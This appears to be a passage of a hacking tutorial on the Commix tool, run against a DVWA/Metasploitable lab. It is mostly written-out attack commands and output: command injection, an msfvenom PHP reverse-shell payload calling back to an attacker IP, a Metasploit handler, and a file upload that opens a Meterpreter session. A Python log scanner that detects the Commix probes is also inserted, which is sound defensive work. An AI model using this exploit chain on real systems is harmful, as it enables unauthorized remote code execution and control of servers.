Now you can type commix -h in the terminal to view the help with all the different options that this tool provides.
root@drd:~# commix -h
Usage: commix [option(s)]
  -h, --help            Show help and exit.

General: These options relate to general matters.
  -v VERBOSE            Verbosity level (0-4, default: 0).
  --version             Show version number and exit.
  --output-dir=OUT..    Set custom output directory path.
  -s SESSION_FILE       Load session from a stored (.sqlite) file.
  --flush-session       Flush session files for current target.
  --ignore-session      Ignore results stored in session file.
  -t TRAFFIC_FILE       Log all HTTP traffic into a textual file.
  --batch               Never ask for user input, use the default behaviour.
  --encoding=ENCOD..    Force character encoding used for data retrieval (e.g.
  --charset=CHARSET     Time-related injection charset (e.g.
  --check-internet      Check internet connection before assessing the target.

Target: This option has to be specified to define the target URL.
  -u URL, --url=URL     Target URL.
  --url-reload          Reload target URL after command execution.
  -l LOGFILE            Parse target from HTTP proxy log file.
  -m BULKFILE           Scan multiple targets given in a textual file.
  -r REQUESTFILE        Load HTTP request from a file.
  --crawl=CRAWLDEPTH    Crawl the website starting from the target URL (1-2,
  -x SITEMAP_URL        Parse target(s) from remote sitemap (.xml) file.

Request: These options can be used to specify how to connect to the target URL.
  -d DATA, --data=..    Data string to be sent through POST.
  --host=HOST           HTTP Host header.
  --referer=REFERER     HTTP Referer header.
  --user-agent=AGENT    HTTP User-Agent header.
  --random-agent        Use a randomly selected HTTP User-Agent header.
  --param-del=PDEL      Set character for splitting parameter values.
  --cookie=COOKIE       HTTP Cookie header.
  --cookie-del=CDEL     Set character for splitting cookie values.
  -H HEADER, --hea..    Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').
  --headers=HEADERS     Extra headers (e.g. 'Accept-Language: fr\nETag: 123').
  --proxy=PROXY         Use a proxy to connect to the target URL (e.g. '127.0.0.1:8080').
  --tor                 Use the Tor network.
  --tor-port=TOR_P..    Set Tor proxy port (default: 8118).
  --tor-check           Check to see if Tor is used properly.
  --auth-url=AUTH_..    Login panel URL.
  --auth-data=AUTH..    Login parameters and data.
  --auth-type=AUTH..    HTTP authentication type (e.g. 'Basic' or 'Digest').
  --auth-cred=AUTH..    HTTP authentication credentials (e.g. 'admin:admin').
  --ignore-401          Ignore HTTP error 401 (Unauthorized).
  --force-ssl           Force usage of SSL/HTTPS.
  --ignore-redirects    Ignore redirection attempts.
  --retries=RETRIES     Retries when the connection times out (default: 3).
We will use the following options: the -u flag defines the target URL, the --cookie= option sets the appropriate cookie information, and the --data= option specifies the POST request string.
commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=ba245268c2d2c08a209bf7db8bd004a0; security=low' --data='ip=127.0.0.1&submit=submit'
The tool launches and displays a banner with some version information, followed by status messages on screen. We can see that a parameter is found to be vulnerable to command injection, and Commix asks us whether we want a pseudo-terminal shell.
Accepting this prompt drops us into an interactive command shell. We can now issue commands such as whoami and uname -a to display information about the server.
Pseudo-Terminal (type '?' for available options)
commix(os_shell) > whoami
commix(os_shell) > uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
This is certainly useful, but a bare command shell only takes us so far. Fortunately, there is a way to combine the functionality of Commix with the powerful msfvenom to ultimately get a Meterpreter session on the target.
Method 2: Uploading a Reverse Shell
Commix has a feature that allows us to write files to the target system. We'll place a reverse shell on the target that calls back to our attacking machine, but before we can do that, we have to build the payload.
Msfvenom is a payload generator that replaced both msfpayload and msfencode back in 2015. This standalone tool can be used to create payloads outside of the Metasploit Framework.
Use the msfvenom command with the following options: the -p flag specifies the payload, lhost specifies the address of the listening host, lport sets the listening port, the -e flag specifies the encoder, and the -f flag specifies the output format. Make sure to use > to write the output to the file payload.php.
root@drd:~# msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.1.100 lport=4321 -e php/base64 -f raw > payload.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1507 (iteration=0)
php/base64 chosen with final size 1507
Payload size: 1507 bytes
The payload was created successfully. Now all we have to do is add the PHP tags to our file. Enter nano payload.php and add <?php at the beginning of the file and ?> at the end of the file. Press Ctrl-X, then Y, then Enter to save.
Now we have to open a handler on our machine to catch the session that is opened from the target. Start Metasploit in a new terminal window by typing msfconsole. After it loads, enter use exploit/multi/handler to load the general-purpose handler.
Next, set the payload, listening address, and port to the values we specified earlier when building our file.
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 172.16.1.100
lhost => 172.16.1.100
msf exploit(multi/handler) > set lport 4321
lport => 4321
Once these are set, start the handler by typing run, an alias for exploit.
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.1.100:4321
Back in our other terminal, we can pass Commix some additional options to get our payload onto the target. The --file-write option specifies the file on our local machine, the --file-dest option sets the destination path on the target, and the --os-cmd option specifies the command to execute once the file has been written to the destination.
commix -u http://172.16.1.102/dvwa/vulnerabilities/exec/ --cookie='PHPSESSID=ba245268c2d2c08a209bf7db8bd004a0; security=low' --data='ip=127.0.0.1&submit=submit' --file-write='/root/payload.php' --file-dest='/var/www/payload.php' --os-cmd='php -f /var/www/payload.php'
This executes our payload on the target, which opens a session back to our handler if it works properly. Commix runs for a little while, and finally we can see that our file has been successfully created on the target.
[*] Testing the (results-based) classic command injection technique... [ SUCCEED ]
[+] The POST parameter 'ip' seems injectable via the (results-based) classic command injection technique.
    [~] Payload: echo YJOSPV$((42+12))$(echo YJOSPV)YJOSPV
[+] The file '/var/www/payload.php' was created successfully!
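From the defender's side, the probe shown in the output above has a recognisable shape (a random uppercase marker wrapping an arithmetic expansion and a command substitution), and the ip field of this form should only ever hold an IPv4 address. The Python below is an added example, not code from the original article or from Commix: it classifies the ip value of each POST body in a few constructed audit lines (hypothetical "timestamp client method path body" layout) and flags the Commix probe, other shell metacharacters, and malformed values.

```python
import re
from urllib.parse import parse_qs

# Commix's results-based probe wraps an arithmetic expansion in a random marker,
# e.g. "echo YJOSPV$((42+12))$(echo YJOSPV)YJOSPV" as seen in the output above.
PROBE_RE = re.compile(
    r"echo\s+([A-Z]{4,8})\$\(\(\s*\d+\s*\+\s*\d+\s*\)\)\$\(echo\s+\1\)\1",
    re.IGNORECASE)
# Shell metacharacters that have no business in an IP-address field.
META_RE = re.compile(r"[;&|`\n]|\$\(")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def classify_ip_param(body):
    """Classify the 'ip' value of a URL-encoded POST body (parse_qs decodes it)."""
    for value in parse_qs(body, keep_blank_values=True).get("ip", []):
        if PROBE_RE.search(value):
            return "commix-probe"
        if META_RE.search(value):
            return "shell-metachar"
        if not IPV4_RE.match(value):
            return "malformed"
    return "clean"


# Constructed sample audit lines (hypothetical layout: ts client method path body).
SAMPLE_LOG = """\
2018-10-18T11:28:51 172.16.1.100 POST /dvwa/vulnerabilities/exec/ ip=127.0.0.1&submit=submit
2018-10-18T11:28:52 172.16.1.100 POST /dvwa/vulnerabilities/exec/ ip=127.0.0.1%3Becho+YJOSPV%24%28%2842%2B12%29%29%24%28echo+YJOSPV%29YJOSPV&submit=submit
2018-10-18T11:29:05 172.16.1.100 POST /dvwa/vulnerabilities/exec/ ip=127.0.0.1%3Bphp+-f+%2Fvar%2Fwww%2Fpayload.php&submit=submit
2018-10-18T11:29:10 10.0.0.5 POST /dvwa/vulnerabilities/exec/ ip=not-an-ip&submit=submit
"""


def scan_log(text):
    """Return (timestamp, client, verdict) for every POST whose 'ip' value is not clean."""
    hits = []
    for line in text.splitlines():
        ts, client, method, path, body = line.split(" ", 4)
        if method != "POST":
            continue
        verdict = classify_ip_param(body)
        if verdict != "clean":
            hits.append((ts, client, verdict))
    return hits


if __name__ == "__main__":
    for ts, client, verdict in scan_log(SAMPLE_LOG):
        print(ts, client, verdict)
```

The same whitelist check (IPV4_RE) is what the form handler itself should enforce before the value ever reaches a shell.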
Now, in the other terminal, we can see that a Meterpreter session has actually been opened. We can execute commands such as getuid and sysinfo to display information about the target.
[*] Sending stage (37775 bytes) to 172.16.1.102
[*] Meterpreter session 1 opened (172.16.1.100:4321 -> 172.16.1.102:40115) at 2018-10-18 11:29:19 -0500
Server username: www-data (33)
OS          : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/linux
These are similar results to what we got before using Commix alone, but now that we have a Meterpreter session, we have much more flexibility in what we can ultimately do.
Conclusion
Hackers go after command injection vulnerabilities because of the power they grant over the target system. Commix is a very useful tool that automates the process of finding and exploiting these vulnerabilities, making life a little easier for the hacker.
In this guide, we learned some basic usage options. We also saw how to combine msfvenom with Commix to upload a payload to the target and get a shell. This flexibility makes Commix an excellent addition to any
Title image by Jarmoluk/Pixabay; screenshots by drd_/Null Byte